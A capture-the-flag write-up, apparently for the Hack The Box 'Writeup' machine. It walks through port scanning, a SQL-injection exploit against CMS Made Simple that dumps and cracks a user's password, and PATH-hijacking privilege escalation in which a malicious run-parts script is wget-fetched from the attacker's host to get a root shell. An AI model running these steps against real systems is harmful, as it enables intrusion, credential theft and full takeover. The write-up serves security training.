Writeup
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 5000 10.129.95.203
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-06 11:25 EDT
Nmap scan report for 10.129.95.203
Host is up (0.14s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Port 80 -> SQL Injection
Port 80 just hosts this image:

This thing says that it is banning IPs that send too many requests, so a directory scan might be counterproductive. Instead, based on the text, going to /writeup
works.

Viewing the page source reveals that this is using CMS Made Simple:

There are loads of exploits for this software.
$ searchsploit made simple
----------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------- ---------------------------------
CMS Made Simple (CMSMS) Showtime2 - File Upload Remote Cod | php/remote/46627.rb
CMS Made Simple 0.10 - 'index.php' Cross-Site Scripting | php/webapps/26298.txt
CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion | php/webapps/26217.html
CMS Made Simple 1.0.2 - 'SearchInput' Cross-Site Scripting | php/webapps/29272.txt
CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection | php/webapps/29941.txt
CMS Made Simple 1.11.10 - Multiple Cross-Site Scripting Vu | php/webapps/32668.txt
CMS Made Simple 1.11.9 - Multiple Vulnerabilities | php/webapps/43889.txt
CMS Made Simple 1.2 - Remote Code Execution | php/webapps/4442.txt
CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection | php/webapps/4810.txt
CMS Made Simple 1.2.4 Module FileManager - Arbitrary File | php/webapps/5600.php
CMS Made Simple 1.4.1 - Local File Inclusion | php/webapps/7285.txt
CMS Made Simple 1.6.2 - Local File Disclosure | php/webapps/9407.txt
CMS Made Simple 1.6.6 - Local File Inclusion / Cross-Site | php/webapps/33643.txt
CMS Made Simple 1.6.6 - Multiple Vulnerabilities | php/webapps/11424.txt
CMS Made Simple 1.7 - Cross-Site Request Forgery | php/webapps/12009.html
CMS Made Simple 1.8 - 'default_cms_lang' Local File Inclus | php/webapps/34299.py
CMS Made Simple 1.x - Cross-Site Scripting / Cross-Site Re | php/webapps/34068.html
CMS Made Simple 2.1.6 - 'cntnt01detailtemplate' Server-Sid | php/webapps/48944.py
CMS Made Simple 2.1.6 - Multiple Vulnerabilities | php/webapps/41997.txt
CMS Made Simple 2.1.6 - Remote Code Execution | php/webapps/44192.txt
CMS Made Simple 2.2.14 - Arbitrary File Upload (Authentica | php/webapps/48779.py
CMS Made Simple 2.2.14 - Authenticated Arbitrary File Uplo | php/webapps/48742.txt
CMS Made Simple 2.2.14 - Persistent Cross-Site Scripting ( | php/webapps/48851.txt
CMS Made Simple 2.2.15 - 'title' Cross-Site Scripting (XSS | php/webapps/49793.txt
CMS Made Simple 2.2.15 - RCE (Authenticated) | php/webapps/49345.txt
CMS Made Simple 2.2.15 - Stored Cross-Site Scripting via S | php/webapps/49199.txt
CMS Made Simple 2.2.5 - (Authenticated) Remote Code Execut | php/webapps/44976.py
CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execut | php/webapps/45793.py
CMS Made Simple < 1.12.1 / < 2.1.3 - Web Server Cache Pois | php/webapps/39760.txt
CMS Made Simple < 2.2.10 - SQL Injection | php/webapps/46635.py
CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File | php/webapps/34300.py
CMS Made Simple Module Download Manager 1.4.1 - Arbitrary | php/webapps/34298.py
CMS Made Simple Showtime2 Module 3.6.2 - (Authenticated) A | php/webapps/46546.py
----------------------------------------------------------- ---------------------------------
I tried a few of them, and only the SQL Injection one worked.
$ python3 46635.py -u http://10.129.95.203/writeup --crack -w /usr/share/wordlists/rockyou.txt
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
[+] Password cracked: raykayjay9
With this, we can ssh
in as jkr
.

Grab the user flag.
Privilege Escalation
PATH Hijacking
I ran a LinPEAS scan to enumerate for me, which found that we are part of the staff
group that can write to certain directories:
[+] Interesting GROUP writable files (not in Home) (max 500)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group staff:
/usr/local/bin
/usr/local/games
/usr/local/sbin
<TRUNCATED>
Having write access to these directories means that we can do PATH hijacking by creating an executable in those files with the same name as processes run by root
. As such, I downloaded pspy64
onto the machine to see if root
was running any processes without full paths.
When run, I saw these processes that were run:
2023/05/06 05:02:16 CMD: UID=0 PID=12903 | run-parts --lsbsysinit /etc/update-motd.d
2023/05/06 05:02:16 CMD: UID=0 PID=12904 | /bin/sh /etc/update-motd.d/10-uname
The run-parts
command did not have a full path, meaning that we can exploit this. We can create a basic bash
script that makes /bin/bash
an SUID binary. Then we can download it into the /usr/local/bin
directory:
jkr@writeup:/usr/local/bin$ wget 10.10.14.13:8000/run-parts
--2023-05-06 05:03:51-- http://10.10.14.13:8000/run-parts
Connecting to 10.10.14.13:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 32 [application/octet-stream]
Saving to: ‘run-parts’
run-parts 100%[============================>] 32 --.-KB/s in 0s
2023-05-06 05:03:51 (6.62 MB/s) - ‘run-parts’ saved [32/32]
jkr@writeup:/usr/local/bin$ chmod +x run-parts
Afterwards, we just need to ssh
back into the machine to execute it and get a root
shell.

Last updated